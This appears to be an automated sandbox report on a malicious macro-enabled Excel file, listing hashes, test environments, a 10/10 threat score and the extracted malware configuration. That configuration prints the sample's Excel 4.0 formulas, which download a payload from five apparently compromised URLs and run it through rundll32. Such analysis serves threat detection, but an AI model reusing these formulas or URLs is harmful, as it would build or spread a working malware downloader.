General
-
Target
e5840a5dd007f5046bdb8ccfea92d04cbaadaa58c1d03e872b23e697b72dd70c
-
Size
103KB
-
Sample
241120-xhsg6a1cmd
-
MD5
8bc1de4dc82cc239ed5d1909262bbec1
-
SHA1
1a0b7d2a7dd047879b95d202e144a18ee1cf2f8f
-
SHA256
e5840a5dd007f5046bdb8ccfea92d04cbaadaa58c1d03e872b23e697b72dd70c
-
SHA512
3614dab408e1d9fd701278738a5159a2ed940e4cdb7dc75d944b7f222c546499994299442080e4a02880663e3c5c35960b6999d1f0def8edb426e90ba01076e2
-
SSDEEP
3072:V7vjgqu8hahYIfiQOVOveshVf4KwJQikmGo2:V7vjgrbtO8eOaDPk1o2
Behavioral task
behavioral1
Sample
e5840a5dd007f5046bdb8ccfea92d04cbaadaa58c1d03e872b23e697b72dd70c.xlsm
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
e5840a5dd007f5046bdb8ccfea92d04cbaadaa58c1d03e872b23e697b72dd70c.xlsm
Resource
win10v2004-20241007-en
Malware Config
Extracted
http://lupus.ktcatl.com/wp-content/uCccWJ/
https://packersandmoversbangalorecharges.com/cgi-bin/UrI6GM87K5u2y2pOW/
http://123breathe.org/error/Drs/
https://greenesqualityflooring.com/error/kUO7NnkpMp2cs/
http://new.hssus.org/wp-includes/blocks/eKID0QAfLUS/
-
formulas
=TODO =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://lupus.ktcatl.com/wp-content/uCccWJ/","..\iix.ocx",0,0) =IF('TTGEHEHEHFHDG'!C15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://packersandmoversbangalorecharges.com/cgi-bin/UrI6GM87K5u2y2pOW/","..\iix.ocx",0,0)) =IF('TTGEHEHEHFHDG'!C17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://123breathe.org/error/Drs/","..\iix.ocx",0,0)) =IF('TTGEHEHEHFHDG'!C19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://greenesqualityflooring.com/error/kUO7NnkpMp2cs/","..\iix.ocx",0,0)) =IF('TTGEHEHEHFHDG'!C21<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://new.hssus.org/wp-includes/blocks/eKID0QAfLUS/","..\iix.ocx",0,0)) =IF('TTGEHEHEHFHDG'!C23<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\rundll32.exe ..\iix.ocx,D""&""l""&""lR""&""egister""&""Serve""&""r")
Extracted
http://lupus.ktcatl.com/wp-content/uCccWJ/
Targets
-
-
Target
e5840a5dd007f5046bdb8ccfea92d04cbaadaa58c1d03e872b23e697b72dd70c
-
Size
103KB
-
MD5
8bc1de4dc82cc239ed5d1909262bbec1
-
SHA1
1a0b7d2a7dd047879b95d202e144a18ee1cf2f8f
-
SHA256
e5840a5dd007f5046bdb8ccfea92d04cbaadaa58c1d03e872b23e697b72dd70c
-
SHA512
3614dab408e1d9fd701278738a5159a2ed940e4cdb7dc75d944b7f222c546499994299442080e4a02880663e3c5c35960b6999d1f0def8edb426e90ba01076e2
-
SSDEEP
3072:V7vjgqu8hahYIfiQOVOveshVf4KwJQikmGo2:V7vjgrbtO8eOaDPk1o2
Score10/10-
Process spawned unexpected child process
This typically indicates the parent process was compromised via an exploit or macro.
-